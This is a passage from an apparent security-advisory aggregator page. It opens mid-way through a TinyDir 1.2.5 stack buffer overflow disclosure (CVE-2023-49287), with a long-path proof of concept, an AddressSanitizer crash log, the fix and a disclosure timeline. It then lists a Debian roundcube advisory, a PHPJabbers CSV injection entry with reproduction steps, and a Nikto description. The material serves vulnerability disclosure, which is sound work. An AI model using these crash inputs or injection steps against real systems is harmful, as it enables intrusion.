$ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
Path: ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
Extension:   
Is dir? yes  
Is regular file? no  
$ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/  
=================================================================  
==2533==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd1ecabeb0 at pc 0x7f37b22544bf bp 0x7ffd1ecaac10 sp 0x7ffd1ecaa3b8  
WRITE of size 513 at 0x7ffd1ecabeb0 thread T0  
    #0 0x7f37b22544be in __interceptor_strcpy ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440  
    #1 0x5625cf301b69 in tinydir_file_open ../tinydir.h:711  
    #2 0x5625cf3021f4 in main /home/raptor/tinydir/samples/file_open_sample.c:12  
    #3 0x7f37b1e29d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58  
    #4 0x7f37b1e29e3f in __libc_start_main_impl ../csu/libc-start.c:392  
    #5 0x5625cf3004e4 in _start (/home/raptor/tinydir/samples/file_open_sample+0x24e4)

Address 0x7ffd1ecabeb0 is located in stack of thread T0 at offset 4704 in frame  
    #0 0x5625cf3018c3 in tinydir_file_open ../tinydir.h:641

  This frame has 3 object(s):  
    [48, 4184) 'dir' (line 642)  
    [4448, 4704) 'file_name_buf' (line 646)  
    [4768, 8864) 'dir_name_buf' (line 645) <== Memory access at offset 4704 partially underflows this variable  
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork  
      (longjmp and C++ exceptions *are* supported)  
SUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440 in __interceptor_strcpy  
Shadow bytes around the buggy address:  
  0x100023d8d780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x100023d8d790: 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2  
  0x100023d8d7a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2  
  0x100023d8d7b0: f2 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00  
  0x100023d8d7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
=>0x100023d8d7d0: 00 00 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 00 00  
  0x100023d8d7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x100023d8d7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x100023d8d800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x100023d8d810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x100023d8d820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
Shadow byte legend (one shadow byte represents 8 application bytes):  
  Addressable:           00  
  Partially addressable: 01 02 03 04 05 06 07   
  Heap left redzone:       fa  
  Freed heap region:       fd  
  Stack left redzone:      f1  
  Stack mid redzone:       f2  
  Stack right redzone:     f3  
  Stack after return:      f5  
  Stack use after scope:   f8  
  Global redzone:          f9  
  Global init order:       f6  
  Poisoned by user:        f7  
  Container overflow:      fc  
  Array cookie:            ac  
  Intra object redzone:    bb  
  ASan internal:           fe  
  Left alloca redzone:     ca  
  Right alloca redzone:    cb  
  Shadow gap:              cc  
==2533==ABORTING  
```

--[ 5 - Affected products

TinyDir 1.2.5 and earlier versions are affected by the vulnerabilities  
discussed in this advisory.

--[ 6 - Remediation

TinyDir developers have released version 1.2.6 [3] that addresses the  
vulnerabilities discussed in this advisory.

Please check the official TinyDir channels for further information about  
fixes.

--[ 7 - Disclosure timeline

2023-11-30: Vulnerabilities reported via GitHub security advisories [4].  
2023-12-01: Proof of concept provided at the request of TinyDir developers.  
2023-12-02: Vulnerabilities fixed in TinyDir's master branch on GitHub.  
2023-12-03: TinyDir 1.2.6 released and GitHub advisory published.  
2023-12-04: GitHub issued CVE-2023-49287 and we published this advisory.

--[ 8 - Acknowledgements

We would like to thank TinyDir developers for triaging and quickly fixing  
the reported vulnerabilities.

--[ 9 - References

[1] https://github.com/cxong/tinydir  
[2] https://github.com/search?q=tinydir.h&type=code  
[3] https://github.com/cxong/tinydir/releases/tag/1.2.6  
[4] https://github.com/cxong/tinydir/security

Copyright (c) 2023 Marco Ivaldi and Humanativa Group. All rights reserved.

TinyDir 1.2.5 Buffer Overflow

Debian Linux Security Advisory 5572-1 - Rene Rehme discovered that roundcube, a skinnable AJAX based webmail solution for IMAP servers, did not properly set headers when handling attachments. This would allow an attacker to load arbitrary JavaScript code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5572-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondDecember 04, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : roundcubeCVE ID         : CVE-2023-47272Debian Bug     : 1055421Rene Rehme discovered that roundcube, a skinnable AJAX based webmailsolution for IMAP servers, did not properly set headers when handlingattachments. This would allow an attacker to load arbitrary JavaScriptcode.For the oldstable distribution (bullseye), this problem has been fixedin version 1.4.15+dfsg.1-1~deb11u2.For the stable distribution (bookworm), this problem has been fixed inversion 1.6.5+dfsg-1~deb12u1.We recommend that you upgrade your roundcube packages.For the detailed security status of roundcube please refer toits security tracker page at:https://security-tracker.debian.org/tracker/roundcubeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmVtkOQACgkQEL6Jg/PVnWTxhQgAimG1yVgg/Ic84EQIqpB014hb/ev5RzapM+xJ5Dwwb1Xs7HMNsvqYBBeXLNIbXgNKkSGF38k3MP2A9aBwyKMV256SVEtKUkiAzCQhX3xsUB5EkpNMXv0GRs9ksjjj/ATwChVVlz5OusTtuDpog44RYGH8CXJTuAVemK2GusdgkrsMu1EvGr7JhtMvjiFW5uYFjI+ADp5KcoIl3AtLCdYhDHz/p687Ze1vJQ0v18jiS2mUMvF7zd8SmwA4uLPAcLIJ+KCyd8A+LYzyWbHVxbxIqMxmuAjQ7TrOH3oE5Be5jN9ShKJv1pj50P2i5/g4H+e5fQ6gQm8oF1CMVJubS1NpIg===KGev-----END PGP SIGNATURE-----

Debian Security Advisory 5572-1

PHPJabbers Appointment Scheduler version 3.0 suffers from a CSV injection vulnerability.

    # Exploit Title: PHPJabbers Appointment Scheduler v3.0 - CSV Injection# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/appointment-scheduler/# Version: v3.0# Tested on: Windows 10, Windows 11, MS Office 2010# CVE-2023-48841Descriptions:PHPJabbers Appointment Scheduler v3.0 is vulnerable to CSV injectionvulnerability which allows an attacker to execute remote code. Thevulnerability exists due to insufficient input validation on theUnique ID field in the Reservations list that is used to construct aCSV file.Steps to Reproduce:1. Login your panel.2. Go to Options Menu then click Language then click Labels section.3. Now use CSV Injection Payload in any field and go to Import/Export.4. Now click export and open your system.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48841)

PHPJabbers Appointment Scheduler 3.0 CSV Injection

Nikto is an Open Source web server scanner which performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers.